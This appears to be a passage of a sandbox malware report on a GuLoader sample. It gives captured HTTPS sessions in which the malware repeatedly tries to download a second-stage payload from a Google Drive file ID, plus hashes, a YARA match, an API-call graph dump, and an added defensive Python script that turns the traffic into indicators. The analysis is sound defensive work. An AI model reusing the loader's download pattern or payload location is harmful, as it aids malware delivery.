                                                                        2025-01-10 15:03:51 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 4e 63 50 77 37 46 52 42 5a 69 68 4c 68 69 6e 79 49 43 72 41 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bNcPw7FRBZihLhinyICrAg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        16 | 192.168.2.10 | 49989 | 142.250.184.238 | 443 | 2900 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-01-10 15:04:02 UTC | 417 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:04:02 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:04:02 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Security-Policy: script-src 'nonce-OzRtHtfuQ4NFFq2SHmZpCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close
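Sessions 11 through 17 on this page are one retry loop: the injected child process (PID 2900) requests the same Google Drive file ID from drive.google.com, follows the 303 to drive.usercontent.google.com, receives Google's generic 404 page (Content-Length 1652) and tries again roughly every 12 seconds, sending the same Firefox 121 User-Agent and the same NID cookie each time. The stage-2 payload was therefore never retrieved during this analysis, so the behaviour of the final stage is unknown. The script below is an added example, not part of the Joe Sandbox report and not GuLoader code; it condenses exchanges like these into per-file-ID retry statistics and IOCs. Its input list is transcribed by hand from the sessions shown above (timestamps, hosts, destination IPs and status codes are the page's); the assessment rules (which host counts as the one serving the body, the "200 means payload received" check) are assumptions made for the example.

```python
"""Added example: summarise a loader's Google Drive download loop from captured HTTP sessions."""
from __future__ import annotations

from collections import defaultdict
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit

# Constructed sample, transcribed from sessions 11-17 of the report:
# (session id, request timestamp UTC, destination IP, Host header, request line, response status).
SESSIONS = [
    (11, "2025-01-10 15:03:26", "142.250.186.97", "drive.usercontent.google.com",
     "GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1", 404),
    (12, "2025-01-10 15:03:37", "142.250.184.238", "drive.google.com",
     "GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1", 303),
    (13, "2025-01-10 15:03:39", "142.250.186.97", "drive.usercontent.google.com",
     "GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1", 404),
    (14, "2025-01-10 15:03:50", "142.250.184.238", "drive.google.com",
     "GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1", 303),
    (15, "2025-01-10 15:03:51", "142.250.186.97", "drive.usercontent.google.com",
     "GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1", 404),
    (16, "2025-01-10 15:04:02", "142.250.184.238", "drive.google.com",
     "GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1", 303),
    (17, "2025-01-10 15:04:03", "142.250.186.97", "drive.usercontent.google.com",
     "GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1", 404),
]

# Assumption for the example: this host only redirects; the body comes from the host it points at.
REDIRECT_HOSTS = {"drive.google.com"}


def request_target(request_line: str) -> str | None:
    """Return the request target of a GET request line, or None for anything else."""
    parts = request_line.split(" ")
    if len(parts) != 3 or parts[0] != "GET":
        return None
    return parts[1]


def drive_file_id(request_line: str) -> str | None:
    """Extract the Drive file id from the /uc?...&id=X or /download?id=X&... forms."""
    target = request_target(request_line)
    if target is None:
        return None
    url = urlsplit(target)
    if url.path not in ("/uc", "/download"):
        return None
    ids = parse_qs(url.query).get("id", [])
    return ids[0] if ids else None


def _ts(text: str) -> datetime:
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)


def assess(sessions) -> list[dict]:
    """Group sessions by Drive file id and describe how the download of each one went."""
    by_id: dict[str, list] = defaultdict(list)
    for sid, ts, dst_ip, host, req, status in sessions:
        fid = drive_file_id(req)
        if fid is not None:
            by_id[fid].append((sid, _ts(ts), dst_ip, host, request_target(req), status))

    findings = []
    for fid, recs in by_id.items():
        recs.sort(key=lambda r: r[1])
        # The loop period is the spacing of requests to the host expected to serve the body.
        final = [r for r in recs if r[3] not in REDIRECT_HOSTS]
        gaps = [int((b[1] - a[1]).total_seconds()) for a, b in zip(final, final[1:])]
        statuses = {r[5] for r in final}
        findings.append({
            "file_id": fid,
            "attempts": len(final),
            "hosts": sorted({r[3] for r in recs}),
            "dst_ips": sorted({r[2] for r in recs}),
            "urls": sorted({f"https://{r[3]}{r[4]}" for r in recs}),
            "final_statuses": statuses,
            "payload_received": 200 in statuses,
            "interval_seconds": (min(gaps), max(gaps)) if gaps else None,
        })
    return findings


if __name__ == "__main__":
    for finding in assess(SESSIONS):
        for key, value in finding.items():
            print(f"{key:>18}: {value}")
```

The file ID and the two URLs are the IOCs worth extracting, but they are brittle: the operator can re-upload the payload under a new ID at any time. The durable signal is the behaviour itself, a process that is not a browser polling Drive download URLs at a fixed cadence with a browser User-Agent and accepting 404 after 404, which is what the interval and status fields capture. Because every attempt here ended in 404, this report tells you nothing about the final stage; if the payload is obtained from another source, the sample should be re-detonated with it reachable.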


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        17 | 192.168.2.10 | 49990 | 142.250.186.97 | 443 | 2900 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-01-10 15:04:03 UTC | 459 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:04:03 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AFiumC6lav6-uZMJwRtmv2-xrQ6Wrts5kfLgLVx4Q7gvPpDNTBADWRdzA50TqPz0zbtPY9FEYvezCg4
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:04:03 GMT
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-i-AOsg2TUseIMYgUH_FIdQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-01-10 15:04:03 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 32 4b 6a 59 38 2d 6f 37 6f 48 54 78 67 52 4e 7a 31 38 37 6d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="82KjY8-o7oHTxgRNz187mA">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID: 18 | Source IP: 192.168.2.10 | Source Port: 49991 | Destination IP: 142.250.184.238 | Destination Port: 443 | PID: 2900 | Process: C:\Users\user\Desktop\Osb7hkGfAb.exe

Timestamp: 2025-01-10 15:04:14 UTC | Bytes transferred: 417 | Direction: OUT | Data:
GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: drive.google.com
Cache-Control: no-cache
Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE

Timestamp: 2025-01-10 15:04:14 UTC | Bytes transferred: 1920 | Direction: IN | Data:
HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 10 Jan 2025 15:04:14 GMT
Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: script-src 'nonce-9mWw9dELkc4XuD84wJt0mQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID: 19 | Source IP: 192.168.2.10 | Source Port: 49992 | Destination IP: 142.250.186.97 | Destination Port: 443 | PID: 2900 | Process: C:\Users\user\Desktop\Osb7hkGfAb.exe

Timestamp: 2025-01-10 15:04:15 UTC | Bytes transferred: 459 | Direction: OUT | Data:
GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE

Timestamp: 2025-01-10 15:04:16 UTC | Bytes transferred: 1851 | Direction: IN | Data:
HTTP/1.1 404 Not Found
X-GUploader-UploadID: AFIdbgTdHiyZGj-LlWeHpQ1ae8TNcUR_QyDTuYfOSndtv-sI9p7jL1lhWb7Q7xwxhxpYrRHH_GLrjEo
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 10 Jan 2025 15:04:15 GMT
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: script-src 'nonce-bwxC__Euzb-00dSfBV4RPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Length: 1652
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
Connection: close

Timestamp: 2025-01-10 15:04:16 UTC | Bytes transferred: 1652 | Direction: IN | Data:
Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 6a 59 36 65 30 31 6a 4f 43 47 31 7a 31 74 73 37 61 31 56 49 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qjY6e01jOCG1z1ts7a1VIA">*{margin:0;padding:0}html,code{font:15px/22px arial


Target ID: 0
Start time: 10:01:08
Start date: 10/01/2025
Path: C:\Users\user\Desktop\Osb7hkGfAb.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Osb7hkGfAb.exe"
Imagebase: 0x400000
File size: 887'424 bytes
MD5 hash: A09950FD9AF3C4E3FF6F778AB5D8CE0F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2779618167.0000000002A16000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 6
Start time: 10:02:14
Start date: 10/01/2025
Path: C:\Users\user\Desktop\Osb7hkGfAb.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Osb7hkGfAb.exe"
Imagebase: 0x400000
File size: 887'424 bytes
MD5 hash: A09950FD9AF3C4E3FF6F778AB5D8CE0F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.3327433008.00000000017C6000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false


Execution Graph

Execution Coverage: 19%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 16.5%
Total number of Nodes: 1511
Total number of Limit Nodes: 46
execution_graph: interactive call-graph data from the report viewer (node id, code address, API calls made at that node, and node->node edges), rendered here as a flat node/edge list that is not readable as text; the graph is summarized by the coverage figures and node counts above.
402bce 17 API calls 4897->4898 4899 401984 lstrlenA 4898->4899 4901 401994 4899->4901 4900 4019d4 4901->4900 4905 4060f7 lstrcpynA 4901->4905 4903 4019c4 4903->4900 4904 4019c9 lstrlenA 4903->4904 4904->4900 4905->4903 4906 40535c 4907 405507 4906->4907 4908 40537e GetDlgItem GetDlgItem GetDlgItem 4906->4908 4910 405537 4907->4910 4911 40550f GetDlgItem CreateThread CloseHandle 4907->4911 4951 4041b0 SendMessageA 4908->4951 4913 405565 4910->4913 4914 405586 4910->4914 4915 40554d ShowWindow ShowWindow 4910->4915 4911->4910 4912 4053ee 4919 4053f5 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4912->4919 4916 405575 4913->4916 4917 405599 ShowWindow 4913->4917 4920 4055c0 4913->4920 4918 4041e2 8 API calls 4914->4918 4953 4041b0 SendMessageA 4915->4953 4954 404154 4916->4954 4924 4055b9 4917->4924 4925 4055ab 4917->4925 4923 405592 4918->4923 4926 405463 4919->4926 4927 405447 SendMessageA SendMessageA 4919->4927 4920->4914 4928 4055cd SendMessageA 4920->4928 4930 404154 SendMessageA 4924->4930 4929 40521e 24 API calls 4925->4929 4931 405476 4926->4931 4932 405468 SendMessageA 4926->4932 4927->4926 4928->4923 4933 4055e6 CreatePopupMenu 4928->4933 4929->4924 4930->4920 4935 40417b 18 API calls 4931->4935 4932->4931 4934 40618a 17 API calls 4933->4934 4936 4055f6 AppendMenuA 4934->4936 4937 405486 4935->4937 4938 405614 GetWindowRect 4936->4938 4939 405627 TrackPopupMenu 4936->4939 4940 4054c3 GetDlgItem SendMessageA 4937->4940 4941 40548f ShowWindow 4937->4941 4938->4939 4939->4923 4942 405643 4939->4942 4940->4923 4945 4054ea SendMessageA SendMessageA 4940->4945 4943 4054b2 4941->4943 4944 4054a5 ShowWindow 4941->4944 4946 405662 SendMessageA 4942->4946 4952 4041b0 SendMessageA 4943->4952 4944->4943 4945->4923 4946->4946 4947 40567f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4946->4947 4949 4056a1 SendMessageA 4947->4949 4949->4949 4950 4056c3 GlobalUnlock SetClipboardData CloseClipboard 4949->4950 4950->4923 4951->4912 4952->4940 4953->4913 
4955 404161 SendMessageA 4954->4955 4956 40415b 4954->4956 4955->4914 4956->4955 4957 40275d 4958 402763 4957->4958 4959 402a5a 4958->4959 4960 40276b FindClose 4958->4960 4960->4959 4961 401a5e 4962 402bac 17 API calls 4961->4962 4963 401a67 4962->4963 4964 402bac 17 API calls 4963->4964 4965 401a0e 4964->4965 4966 40495e 4967 40498a 4966->4967 4968 40496e 4966->4968 4970 404990 SHGetPathFromIDListA 4967->4970 4971 4049bd 4967->4971 4977 4057f7 GetDlgItemTextA 4968->4977 4973 4049a0 4970->4973 4974 4049a7 SendMessageA 4970->4974 4972 40497b SendMessageA 4972->4967 4975 40140b 2 API calls 4973->4975 4974->4971 4975->4974 4977->4972 4978 4029de 4979 406500 5 API calls 4978->4979 4980 4029e5 4979->4980 4981 402bce 17 API calls 4980->4981 4982 4029ee 4981->4982 4983 402a2a 4982->4983 4988 40614a 4982->4988 4985 4029fc 4985->4983 4992 406134 4985->4992 4989 406155 4988->4989 4990 406178 IIDFromString 4989->4990 4991 406171 4989->4991 4990->4985 4991->4985 4995 406119 WideCharToMultiByte 4992->4995 4994 402a1d CoTaskMemFree 4994->4983 4995->4994 4996 4028df 4997 4028e2 4996->4997 4998 402925 4997->4998 4999 40290e 4997->4999 5005 4027bf 4997->5005 5002 40293f 4998->5002 5003 40292f 4998->5003 5000 402922 4999->5000 5001 402913 4999->5001 5010 406055 wsprintfA 5000->5010 5009 4060f7 lstrcpynA 5001->5009 5004 40618a 17 API calls 5002->5004 5006 402bac 17 API calls 5003->5006 5004->5005 5006->5005 5009->5005 5010->5005 4626 4023e0 4627 402bce 17 API calls 4626->4627 4628 4023f1 4627->4628 4629 402bce 17 API calls 4628->4629 4630 4023fa 4629->4630 4631 402bce 17 API calls 4630->4631 4632 402404 GetPrivateProfileStringA 4631->4632 5011 401b63 5012 402bce 17 API calls 5011->5012 5013 401b6a 5012->5013 5014 402bac 17 API calls 5013->5014 5015 401b73 wsprintfA 5014->5015 5016 402a5a 5015->5016 5017 401d65 5018 401d78 GetDlgItem 5017->5018 5019 401d6b 5017->5019 5021 401d72 5018->5021 5020 402bac 17 API calls 5019->5020 5020->5021 5022 401db9 GetClientRect LoadImageA 
SendMessageA 5021->5022 5023 402bce 17 API calls 5021->5023 5025 401e1a 5022->5025 5027 401e26 5022->5027 5023->5022 5026 401e1f DeleteObject 5025->5026 5025->5027 5026->5027 5028 4042e6 5029 4042fc 5028->5029 5031 404408 5028->5031 5032 40417b 18 API calls 5029->5032 5030 404477 5033 404541 5030->5033 5034 404481 GetDlgItem 5030->5034 5031->5030 5031->5033 5039 40444c GetDlgItem SendMessageA 5031->5039 5037 404352 5032->5037 5038 4041e2 8 API calls 5033->5038 5035 404497 5034->5035 5036 4044ff 5034->5036 5035->5036 5042 4044bd SendMessageA LoadCursorA SetCursor 5035->5042 5036->5033 5043 404511 5036->5043 5040 40417b 18 API calls 5037->5040 5041 40453c 5038->5041 5061 40419d EnableWindow 5039->5061 5045 40435f CheckDlgButton 5040->5045 5065 40458a 5042->5065 5048 404517 SendMessageA 5043->5048 5049 404528 5043->5049 5059 40419d EnableWindow 5045->5059 5048->5049 5049->5041 5053 40452e SendMessageA 5049->5053 5050 404472 5062 404566 5050->5062 5051 40437d GetDlgItem 5060 4041b0 SendMessageA 5051->5060 5053->5041 5056 404393 SendMessageA 5057 4043b1 GetSysColor 5056->5057 5058 4043ba SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5056->5058 5057->5058 5058->5041 5059->5051 5060->5056 5061->5050 5063 404574 5062->5063 5064 404579 SendMessageA 5062->5064 5063->5064 5064->5030 5068 4057d9 ShellExecuteExA 5065->5068 5067 4044f0 LoadCursorA SetCursor 5067->5036 5068->5067 4674 40166a 4675 402bce 17 API calls 4674->4675 4676 401671 4675->4676 4677 402bce 17 API calls 4676->4677 4678 40167a 4677->4678 4679 402bce 17 API calls 4678->4679 4680 401683 MoveFileA 4679->4680 4681 401696 4680->4681 4682 40168f 4680->4682 4683 40646b 2 API calls 4681->4683 4686 4022e2 4681->4686 4684 401423 24 API calls 4682->4684 4685 4016a5 4683->4685 4684->4686 4685->4686 4687 405ed6 36 API calls 4685->4687 4687->4682 4688 40216b 4689 402bce 17 API calls 4688->4689 4690 402172 4689->4690 4691 402bce 17 API calls 4690->4691 4692 40217c 4691->4692 